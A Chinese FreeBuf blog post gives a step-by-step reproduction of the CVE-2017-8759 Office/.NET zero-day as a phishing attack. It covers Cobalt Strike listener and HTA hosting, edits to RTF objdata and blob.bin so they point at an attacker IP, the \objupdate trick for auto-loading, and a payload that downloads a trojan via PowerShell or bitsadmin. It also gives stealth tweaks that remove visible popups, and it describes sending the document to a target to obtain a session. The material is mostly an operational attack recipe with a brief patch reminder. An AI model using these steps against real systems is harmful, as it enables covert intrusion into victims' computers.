*本文原创作者 Lz1y,本位属于 FreeBuf 原创奖励计划,禁止转载
CVE-2017-8759 是前几天出的 0 DAY ,搜了下,国内几乎没有人复现,这个洞总体来说,危害很大,而且比CVE-2017-0199 更难防御。
漏洞成因分析:
360:一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警
FireEye:FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY
本人尝试了下复现,的确有很多坑!国外的大牛们也没有把利用方式说的很完善。
利用的文件:
本人整理的:
文件分别来自:
这次的攻击文件:cmd.hta exploit.txt blob.bin
PS:cmd.hta中嵌入了VBS脚本,可以根据自己的需求更改内容(可以使用powershell直接下载并运行木马,也可以使用Windows中的bitsadmin下载木马运行)
我整理的HTA文件已经处理过啦~不会有HTA的白色闪烁,以及powershell的蓝色弹框。本机测试完全无任何怀疑点
然后将cmd.hta改名为cmd.jpg,并且修改当中的http://192.168.211.149:80为你的攻击IP
将exploit.txt中的的URL同样修改成你的IP
利用工具:Cobal Strike,Office 2013,C32
选择Cobal Strike的原因是,因为这个漏洞需要搭建web服务,而Cobal Strike丰富的钓鱼模块正好满足了我们的需求
漏洞利用过程
首先,打开Cobal Strike
打开一个Listener(Cobal Strike = > Listener => add)
添加一个HTTPS的监听器,端口为443
然后Attacks=>Web Drive-by=> HOST file
切记Mime设置为HTA,Launch
接着再来一次Attacks=>Web Drive-by=> HOST file
接下来生成木马 Attacks=>Web Drive-by=> Script Web Delivery
点击Attacks=>Web Drive-by=> mange
查看当前的web页面~
接下来就是制作钓鱼文档
打开office,本人装的是win7,所以是office2013.不过这个洞跟office版本没啥关系,在WPS中用户如果双击了图块,也是会造成漏洞的。
插入对象
设置如下
点击确定。另存为Doc3.rtf。注意!!!是rtf格式!!!不然后面步骤会失败!!!!!!
使用编辑器打开Doc3.rtf。找到{\object\objautlink\rsltpict\objw4321\objh4321{\*\objdata
这一部分,修改为{\object\objupdate\objautlink\rsltpict\objw4321\objh4321
可以让文档自动加载payload~
然后C32打开blob.bin找到以下这一区
修改十六进制部分,改为http://{攻击IP}/exploit.txt
我就改成http://192.168.211.149/exploit.txt
然后全选,反键拷贝为HEX格式化
替换Doc3.rtf中的
替换掉objdata一直到}{\result 中间的所有十六进制数据
然后保存,这样子攻击文档就制作好了~
接下来将文档发送给目标
目标点击后
无需点击是否
得到了session~
因为修改了HTA部分,所以是不存在弹框闪烁的问题(可能会被杀软检测到),目前这个0day影响还是很大的。没有打补丁的小伙伴记得修复哦~
动图(无弹框):